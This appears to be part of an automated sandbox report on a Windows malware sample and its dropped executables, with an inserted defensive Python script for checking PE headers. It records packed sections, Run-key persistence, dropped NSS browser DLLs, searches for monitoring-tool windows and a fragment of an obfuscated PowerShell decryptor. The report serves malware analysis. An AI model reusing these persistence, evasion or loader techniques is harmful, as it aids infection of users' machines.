Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Unpacked PE file: 36.2.0ac2a0f3ae.exe.a10000.0.unpack :EW;.rsrc:W;.idata :W;yficgynw:EW;ryhifnco:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Unpacked PE file: 37.2.4136f86ac7.exe.c10000.0.unpack :EW;.rsrc:W;.idata :W;cwahjnig:EW;dpfgpfkz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;cwahjnig:EW;dpfgpfkz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Unpacked PE file: 38.2.3160604f40.exe.50000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xxdbzcjj:EW;txsnlhpz:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xxdbzcjj:EW;txsnlhpz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Unpacked PE file: 39.2.0ac2a0f3ae.exe.a10000.0.unpack :EW;.rsrc:W;.idata :W;yficgynw:EW;ryhifnco:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Unpacked PE file: 40.2.4136f86ac7.exe.c10000.0.unpack :EW;.rsrc:W;.idata :W;cwahjnig:EW;dpfgpfkz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;cwahjnig:EW;dpfgpfkz:EW;.taggant:EW;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Key)$ivBytes = [Conv'$decoded += $U1wK7PYc1Ca2$Kvt8oekCIi2L = 'ert]::FromBase64String($IV)$encryptedBy'$decoded += $Kvt8oekCIi2L$GNHT65Ml89Vm = 'tes = [Convert]::FromBase64String($En
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C68C410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C68C410
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: 0ac2a0f3ae.exe.23.dr Static PE information: real checksum: 0x2acccc should be: 0x2a9f1d
Source: DocumentsECAFHIIJJE.exe.0.dr Static PE information: real checksum: 0x324fbd should be: 0x32a75a
Source: file1[1].exe.23.dr Static PE information: real checksum: 0x1da948 should be: 0x1d3849
Source: 4136f86ac7.exe.23.dr Static PE information: real checksum: 0x311d1a should be: 0x3136e2
Source: random[1].exe.23.dr Static PE information: real checksum: 0x2acccc should be: 0x2a9f1d
Source: file1.exe.23.dr Static PE information: real checksum: 0x1da948 should be: 0x1d3849
Source: 3160604f40.exe.23.dr Static PE information: real checksum: 0x1c5866 should be: 0x1c07c7
Source: file.exe Static PE information: real checksum: 0x1c5866 should be: 0x1c07c7
Source: random[1].exe.0.dr Static PE information: real checksum: 0x311d1a should be: 0x3136e2
Source: skotes.exe.20.dr Static PE information: real checksum: 0x324fbd should be: 0x32a75a
Source: random[1].exe0.23.dr Static PE information: real checksum: 0x1c5866 should be: 0x1c07c7
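The "Unpacked PE file", "real checksum" and "section name" entries in this block are all read from the PE headers, so they can be reproduced without running the sample. As an added example (not part of the Joe Sandbox report and not code from the sample), the following Python recomputes the image checksum the way CheckSumMappedFile does, lists sections that are both writable and executable, section names outside the usual linker set, raw sections above 1 MiB, and the section holding the entry point. The PE it checks is constructed inline to mirror the layout reported for file.exe (unnamed, .rsrc, .idata, unnamed, xxdbzcjj, txsnlhpz, .taggant, entry point in .taggant, stored CheckSum 0x1c5866); the computed value for this synthetic file is its own, not the report's 0x1c07c7.

```python
"""Static PE triage for the packer indicators listed above (added example, standard library only)."""
import struct

SCN_CODE, SCN_INIT = 0x00000020, 0x00000040
SCN_EXEC, SCN_READ, SCN_WRITE = 0x20000000, 0x40000000, 0x80000000
RWX = SCN_EXEC | SCN_READ | SCN_WRITE
EXPECTED_NAMES = {".text", ".rdata", ".data", ".idata", ".edata", ".rsrc", ".reloc",
                  ".bss", ".tls", ".pdata", ".CRT", ".00cfg", ".didat"}
RAW_SIZE_LIMIT = 0x100000  # the report flags raw sections larger than 1 MiB


def checksum_offset(data: bytes) -> int:
    """File offset of OptionalHeader.CheckSum (identical for PE32 and PE32+)."""
    return struct.unpack_from("<I", data, 0x3C)[0] + 88


def pe_checksum(data: bytes) -> int:
    """Image checksum as CheckSumMappedFile computes it: add every dword with end-around
    carry, skipping the CheckSum field, fold to 16 bits, then add the file length."""
    skip = checksum_offset(data) & ~3
    padded = data + b"\0" * ((-len(data)) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == skip:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def parse_headers(data: bytes):
    """Return (entry_rva, stored_checksum, section list) from a PE32/PE32+ file."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    nsec = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    stored = struct.unpack_from("<I", data, opt + 64)[0]
    sections = []
    for i in range(nsec):
        name, vsize, va, raw, *_, flags = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"),
                         "va": va, "vsize": vsize, "raw": raw, "flags": flags})
    return entry, stored, sections


def pe_triage(data: bytes) -> dict:
    """Collect the header-level indicators this report lists for the dropped executables."""
    entry, stored, secs = parse_headers(data)
    computed = pe_checksum(data)
    entry_sec = next((s["name"] for s in secs
                      if s["va"] <= entry < s["va"] + max(s["vsize"], s["raw"])), None)
    return {
        "stored_checksum": stored, "computed_checksum": computed, "checksum_ok": stored == computed,
        "wx_sections": [s["name"] for s in secs if s["flags"] & SCN_EXEC and s["flags"] & SCN_WRITE],
        "odd_names": [s["name"] for s in secs if s["name"] not in EXPECTED_NAMES],
        "oversized": [s["name"] for s in secs if s["raw"] > RAW_SIZE_LIMIT],
        "entry_section": entry_sec,
    }


def with_checksum(data: bytes, value: int) -> bytes:
    """Return a copy of the file with OptionalHeader.CheckSum overwritten."""
    off = checksum_offset(data)
    return data[:off] + struct.pack("<I", value) + data[off + 4:]


def build_sample_pe(stored_checksum: int = 0x1C5866) -> bytes:
    """Constructed PE32 (valid headers, filler section bodies, not runnable) that mirrors the
    section layout and stored CheckSum this report gives for file.exe."""
    layout = [(b"", 0x200, SCN_CODE | RWX), (b".rsrc", 0x200, SCN_INIT | SCN_READ | SCN_WRITE),
              (b".idata", 0x200, SCN_INIT | SCN_READ | SCN_WRITE), (b"", 0x200, RWX),
              (b"xxdbzcjj", 0x1A1600, RWX), (b"txsnlhpz", 0x200, RWX), (b".taggant", 0x200, RWX)]
    hdr_size, va, ptr, entry, sec_hdrs, body = 0x400, 0x1000, 0x400, 0, b"", b""
    for name, raw, flags in layout:
        vsize = (raw + 0xFFF) & ~0xFFF
        if name == b".taggant":
            entry = va + 0x10                      # entry point inside .taggant, as reported
        sec_hdrs += struct.pack("<8sIIIIIIHHI", name, vsize, va, raw, ptr, 0, 0, 0, 0, flags)
        body += b"\xCC" * raw                      # filler in place of real section content
        va, ptr = va + vsize, ptr + raw
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, len(layout), 0, 0, 0, 224, 0x0102)
    opt = struct.pack("<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6,
                      0x10B, 14, 0, 0, 0, 0, entry, 0x1000, 0x2000, 0x400000, 0x1000, 0x200,
                      6, 0, 0, 0, 6, 0, 0, va, hdr_size, stored_checksum, 2, 0x8140,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16) + b"\0" * 128
    head = dos + b"PE\0\0" + coff + opt + sec_hdrs
    return head + b"\0" * (hdr_size - len(head)) + body


if __name__ == "__main__":
    for key, value in pe_triage(build_sample_pe()).items():
        print(f"{key}: {value}")
```

Two caveats when reading the output. Windows only enforces the CheckSum for drivers and a few system images, so a mismatch in a user-mode EXE is not an error by itself; it is, however, typical of a file that was packed or patched after linking, which is why the report lists it for every dropped binary here. Writable-plus-executable sections are the stronger tell: the "Unpacked PE file" lines record exactly those sections changing from :ER to :EW at run time as the packer writes its decrypted payload into them.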
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: xxdbzcjj
Source: file.exe Static PE information: section name: txsnlhpz
Source: file.exe Static PE information: section name: .taggant
Source: DocumentsECAFHIIJJE.exe.0.dr Static PE information: section name:
Source: DocumentsECAFHIIJJE.exe.0.dr Static PE information: section name: .idata
Source: DocumentsECAFHIIJJE.exe.0.dr Static PE information: section name: lwvftjpd
Source: DocumentsECAFHIIJJE.exe.0.dr Static PE information: section name: ppdaehht
Source: DocumentsECAFHIIJJE.exe.0.dr Static PE information: section name: .taggant
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: .idata
Source: random[1].exe.0.dr Static PE information: section name: cwahjnig
Source: random[1].exe.0.dr Static PE information: section name: dpfgpfkz
Source: random[1].exe.0.dr Static PE information: section name: .taggant
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: skotes.exe.20.dr Static PE information: section name:
Source: skotes.exe.20.dr Static PE information: section name: .idata
Source: skotes.exe.20.dr Static PE information: section name: lwvftjpd
Source: skotes.exe.20.dr Static PE information: section name: ppdaehht
Source: skotes.exe.20.dr Static PE information: section name: .taggant
Source: random[1].exe.23.dr Static PE information: section name:
Source: random[1].exe.23.dr Static PE information: section name: .idata
Source: random[1].exe.23.dr Static PE information: section name: yficgynw
Source: random[1].exe.23.dr Static PE information: section name: ryhifnco
Source: random[1].exe.23.dr Static PE information: section name: .taggant
Source: 0ac2a0f3ae.exe.23.dr Static PE information: section name:
Source: 0ac2a0f3ae.exe.23.dr Static PE information: section name: .idata
Source: 0ac2a0f3ae.exe.23.dr Static PE information: section name: yficgynw
Source: 0ac2a0f3ae.exe.23.dr Static PE information: section name: ryhifnco
Source: 0ac2a0f3ae.exe.23.dr Static PE information: section name: .taggant
Source: file1[1].exe.23.dr Static PE information: section name:
Source: file1[1].exe.23.dr Static PE information: section name: .rsrc
Source: file1[1].exe.23.dr Static PE information: section name: .idata
Source: file1[1].exe.23.dr Static PE information: section name:
Source: file1[1].exe.23.dr Static PE information: section name: ytlmplcn
Source: file1[1].exe.23.dr Static PE information: section name: gdxiagsi
Source: file1[1].exe.23.dr Static PE information: section name: .taggant
Source: file1.exe.23.dr Static PE information: section name:
Source: file1.exe.23.dr Static PE information: section name: .rsrc
Source: file1.exe.23.dr Static PE information: section name: .idata
Source: file1.exe.23.dr Static PE information: section name:
Source: file1.exe.23.dr Static PE information: section name: ytlmplcn
Source: file1.exe.23.dr Static PE information: section name: gdxiagsi
Source: file1.exe.23.dr Static PE information: section name: .taggant
Source: 4136f86ac7.exe.23.dr Static PE information: section name:
Source: 4136f86ac7.exe.23.dr Static PE information: section name: .idata
Source: 4136f86ac7.exe.23.dr Static PE information: section name: cwahjnig
Source: 4136f86ac7.exe.23.dr Static PE information: section name: dpfgpfkz
Source: 4136f86ac7.exe.23.dr Static PE information: section name: .taggant
Source: random[1].exe0.23.dr Static PE information: section name:
Source: random[1].exe0.23.dr Static PE information: section name: .rsrc
Source: random[1].exe0.23.dr Static PE information: section name: .idata
Source: random[1].exe0.23.dr Static PE information: section name:
Source: random[1].exe0.23.dr Static PE information: section name: xxdbzcjj
Source: random[1].exe0.23.dr Static PE information: section name: txsnlhpz
Source: random[1].exe0.23.dr Static PE information: section name: .taggant
Source: 3160604f40.exe.23.dr Static PE information: section name:
Source: 3160604f40.exe.23.dr Static PE information: section name: .rsrc
Source: 3160604f40.exe.23.dr Static PE information: section name: .idata
Source: 3160604f40.exe.23.dr Static PE information: section name:
Source: 3160604f40.exe.23.dr Static PE information: section name: xxdbzcjj
Source: 3160604f40.exe.23.dr Static PE information: section name: txsnlhpz
Source: 3160604f40.exe.23.dr Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C65B536 push ecx; ret 0_2_6C65B549
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Code function: 20_2_0073D91C push ecx; ret 20_2_0073D92F
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Code function: 20_2_00731359 push es; ret 20_2_0073135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 21_2_00FFD91C push ecx; ret 21_2_00FFD92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 21_2_00FEBA83 push ss; retf 21_2_00FEBA85
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_00FFD91C push ecx; ret 23_2_00FFD92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_00FFDFC6 push ecx; ret 23_2_00FFDFD9
Source: file.exe Static PE information: section name: xxdbzcjj entropy: 7.9542877120760425
Source: DocumentsECAFHIIJJE.exe.0.dr Static PE information: section name: entropy: 7.052460894096881
Source: random[1].exe.0.dr Static PE information: section name: entropy: 7.049831354626162
Source: skotes.exe.20.dr Static PE information: section name: entropy: 7.052460894096881
Source: random[1].exe.23.dr Static PE information: section name: entropy: 7.799529425951728
Source: 0ac2a0f3ae.exe.23.dr Static PE information: section name: entropy: 7.799529425951728
Source: file1[1].exe.23.dr Static PE information: section name: entropy: 7.967430741794287
Source: file1[1].exe.23.dr Static PE information: section name: ytlmplcn entropy: 7.953162268272761
Source: file1.exe.23.dr Static PE information: section name: entropy: 7.967430741794287
Source: file1.exe.23.dr Static PE information: section name: ytlmplcn entropy: 7.953162268272761
Source: 4136f86ac7.exe.23.dr Static PE information: section name: entropy: 7.049831354626162
Source: random[1].exe0.23.dr Static PE information: section name: xxdbzcjj entropy: 7.9542877120760425
Source: 3160604f40.exe.23.dr Static PE information: section name: xxdbzcjj entropy: 7.9542877120760425

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\DocumentsECAFHIIJJE.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe
Source: C:\Users\user\DocumentsECAFHIIJJE.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\DocumentsECAFHIIJJE.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\file1[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\DocumentsECAFHIIJJE.exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3160604f40.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0ac2a0f3ae.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4136f86ac7.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\DocumentsECAFHIIJJE.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Window searched: window name: FilemonClass
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Window searched: window name: RegmonClass
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Window searched: window name: FilemonClass
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Window searched: window name: Regmonclass
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Window searched: window name: Filemonclass
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: FilemonClass
